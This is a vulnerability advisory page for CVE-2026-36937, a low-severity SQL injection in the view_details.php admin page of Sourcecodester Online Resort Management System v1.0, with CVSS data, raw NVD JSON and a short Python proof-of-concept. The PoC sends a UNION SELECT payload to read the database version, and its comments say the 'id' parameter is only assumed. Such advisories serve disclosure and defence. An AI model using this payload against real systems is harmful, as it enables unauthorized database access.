Security Vulnerability Report
中文
CVE-2026-36937 CVSS 2.7 LOW

CVE-2026-36937

Published: 2026-04-13 16:16:30
Last Modified: 2026-04-17 15:28:30

Description

Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL injection in /orms/admin/reservations/view_details.php.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sourcecodester Online Resort Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Code for CVE-2026-36937 # Target: Sourcecodester Online Resort Management System v1.0 # Endpoint: /orms/admin/reservations/view_details.php import requests def check_sqli(url, session_cookie): # Vulnerable parameter assumption: id # Payload attempts to cause a time delay or extract version payload = "?id=1' UNION SELECT NULL, version(), NULL, NULL, NULL, NULL-- -" headers = { "Cookie": f"PHPSESSID={session_cookie}" } try: response = requests.get(url + payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent. Check response for database version output.") return response.text else: print("[-] Unexpected status code:", response.status_code) except Exception as e: print(f"[!] Error: {e}") # Usage # target = "http://target-ip/orms/admin/reservations/view_details.php" # check_sqli(target, "valid_admin_session_id")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36937", "sourceIdentifier": "[email protected]", "published": "2026-04-13T16:16:29.927", "lastModified": "2026-04-17T15:28:29.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL injection in /orms/admin/reservations/view_details.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-1.md", "source": "[email protected]"}]}}